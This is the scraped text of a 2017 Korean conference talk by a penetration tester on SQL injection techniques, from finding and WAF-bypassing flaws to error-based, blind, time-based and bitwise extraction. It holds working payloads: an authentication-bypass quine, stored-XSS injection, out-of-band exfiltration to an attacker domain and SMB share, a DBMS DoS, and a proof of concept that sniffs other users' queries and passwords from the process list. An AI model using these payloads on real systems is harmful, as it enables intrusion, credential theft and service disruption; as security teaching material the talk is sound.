웹해킹이라고 무시하 는 것들 보소 -...

웹해킹이라고 무시하 는 것들 보소

2017.07.10

RUBIYA805[AT]GMAIL[DOT]COM

SQL Injection 끝나지 않은 위협

2017.07.10

RUBIYA805[AT]GMAIL[DOT]COM

Who am I

• 정도원 aka rubiya

• Penetration tester

• Web application bughuter

• Pwned 20+ wargame

• @kr_rubiya

• 백수 · Jobless

• How to find vulnerability?

• How to exploit vulnerability?

• Exploit more smartly

• MITM SQL Injection

What is SQL Injection

SELECT * FROM users WHERE name = '" + userName + "';


SELECT * FROM users WHERE name = ‘FooBar’;


SELECT * FROM users WHERE name = ‘1’ OR ‘1’=‘1’;

Easy to access

NT Web Technology Vulnerabilities

But…

Why hard to prevent

How to find sqli vuln?

How about AEG?

How to find sqli vuln?

Indirect SQL Injection

Web Application Firewall

• 웹 어플리케이션을 보호할 목적으로 개발된 공격 차단 솔루션


• 패턴 기반 방화벽



• Pattern = ‘ or ‘1’=‘1

‘ and ‘1’=‘1

‘ || ‘1’=‘1



• Pattern = ‘ or ‘1’=‘1 ‘ or ‘2’=‘2

‘ and ‘1’=‘1

‘ || ‘1’=‘1



• Pattern = ‘ or ‘1’=‘1

‘ and ‘1’=‘1

‘ || ‘1’=‘1

‘ or ‘2’=‘2



• Pattern = ‘ or ‘1’=‘1 ‘ or ‘3’=‘3

‘ and ‘1’=‘1

‘ || ‘1’=‘1

‘ or ‘2’=‘2


• ASP에서는 %[00-FF] 범위를 초과하면 %를 무시



?id=‘UN%ION SE%LECT 1--;



?id=‘UN%ION SE%LECT 1--;

↓

?id=‘UNION SELECT 1--;

SQL Injection + DDOS?

How to exploit vulnerability?

• Classic SQL Injection

• Blind SQL Injection

• Error Based SQL Injection

• Error Based Blind SQL Injection

• Time Based Blind SQL Injection

Error Based SQL Injection

• 에러 메세지를 클라이언트에 출력해줄 때 가능

• 원하는 값을 에러 메세지에 포함시키는 기법

• DBMS마다 공격 방법이 다름

Error Based SQL Injection - MSSQL

Error Based SQL Injection - MySQL

• Duplicate entry

• XPATH syntax error

• BIGINT value is out of range in

Error Based SQL Injection - MySQL

• Duplicate entry

‘||1 group by mid(version(),rand())having min(1)#

• XPATH syntax error

‘|updatexml(0,concat(0xa,version()),0)#

• BIGINT value is out of range in

‘--~(select*from(select@@version)f)#

Error Based Blind SQL Injection

• Query 결과값의 True/False 여부를 알 수 없을 때 사용

• 에러 발생시에 예외처리가 될 때 가능


ascii(substr((select pw from users),1,1))=97


select(select 96 union select

ascii(substr((select pw from users),1,1)))






96,97 return -> error



97 return -> no error

Time Based Blind SQL Injection

Time Based Blind SQL Injection

• MySQL

sleep(), benchmark()

• MSSQL

waitfor delay, waitfor time

• Oracle

dbms_lock.sleep()

Compounded SQL Injection

• SQLi + XSS

• SQLi + Authentication Bypass

• Out Of Band SQLi

SQLi + XSS

• Insert, Update 가 가능할 경우 Stored XSS 연계

• Iframe 태그를 통한 브라우저 1-Day 공격 유행

SQLi + XSS

• Insert, Update 가 가능할 경우 Stored XSS 연계

• Iframe 태그를 통한 브라우저 1-Day 공격 유행

INSERT INTO board(no,user,<script>evilcode</script>)

UPDATE board SET content=<script>evilcode</script>

SQLi + Authentication Bypass

• Union SQL Injection

• 재귀적 return값을 통한 인증 우회

Union SQL Injection

• Object Injecton

• SSRF

• XML External Entity

• LFI / RFI

재귀적 return값을 통한 인증 우회


s = 's = %r\nprint(s%%s)'

print(s%s)


SELECT REPLACE(REPLACE('SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine',CHAR(34),CHAR(39)),CHAR(36),'SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS Quine') AS Quine


if(queryResult)

if(queryResult == input)

loginSuccess()


?id=asd' union select 1,'admin',REPLACE(@v:='asd\' union select 1,\'admin\',REPLACE(@v:=\'2\',1+1,REPLACE(REPLACE(@v,\'\\\\\',\'\\\\\\\\\'),\'\\\'\',\'\\\\\\\'\'))--',1+1,REPLACE(REPLACE(@v,'\\','\\\\'),'\'','\\\''))--

Out Of Band SQLi

• 외부 서버로의 Packet 전송

• 내부 네트워크 파일 접근

• SQL 서버에 대한 DoS

Out Of Band SQLi

• DNS Query

UTL_HTTP.REQUEST('http://'||(select…)||'.mydomain');

• Access SMB file

load_file('\\\\192.168.0.101\\aa');

DBMS에 대한 DoS

• BENCHMARK()

• Heavy Query

• CVE-2015-4870

CVE-2015-4870

select * from information_schema.tables

procedure analyse((select*from(select 1)x),1);

Lord of SQL Injection

Exploit more smartly

• Bitwise operation Blind SQL Injection

• UPDATE, INSERT Blind SQL Injection without modify data

• MITM SQL Injection

Blind SQL Injection의 단점

• 느리다.

• 로그가 많이 남는다.

Bitwise operation Blind SQL Injection

ascii(substr((select pw from users),1,1))=97


substr(

lpad(

bin(

ascii(substr((select pw from users),1,1))

)

,8,0)

,1,1) = 1


substr(

lpad(

bin(

97

)

,8,0)

,1,1) = 1


substr(

lpad(

1100111

,8,0)

,1,1) = 1


substr(01100111,1,1) = 1


substr(lpad(bin(

ascii(substr((select pw from users),1,1))

),7,0),1,1)

MITM SQL Injection

• Information_schema.processlist.info

Sniff Query?

• 회원가입

insert into users values(“guest123”,md5(“mypass666”))

• 로그인

select...where id=‘guest123’ and pw=md5(‘mypass666’)

But…

• 직접 Sniffing하는게 너무 느리다면 DBMS에게 시키자!

• BENCHMARK(count,expr)

• @var_name = expr

SELECT benchmark(9999999,

@query:=concat(

@query,(select info from information_schema.processlist)

)

)

Issues

• 반복된 값을 조회할 때 Query의 결과값이 cache됨

select 권한만 가지고는 cache를 끌 수 없음

• 한번 조회된 query가 무수히 조회됨

Proof of Concept

SELECT @query:=0x3a3a UNION SELECT @tmp:=0x20 UNION SELECT benchmark(500000,(@tmp:= (SELECT Group_concat(info) FROM information_schema.processlist WHERE info NOT LIKE 0x254d49544d5f53514c495f50574e25 or sleep(0)/*MITM_SQLI_PWN*/))^(IF((@tmp!=0x00)&&(@query NOT LIKE concat(0x253a3a,replace(@tmp,0x0a,0x5c5c6e),0x3a3a25)), @query:=concat(@query,replace(@tmp,0x0a,0x5c6e),0x3a3a),0))) UNION SELECT @query limit 3,1

Proof of Concept

Tank You [email protected]

웹해킹이라고 무시하 는 것들 보소 -...

Documents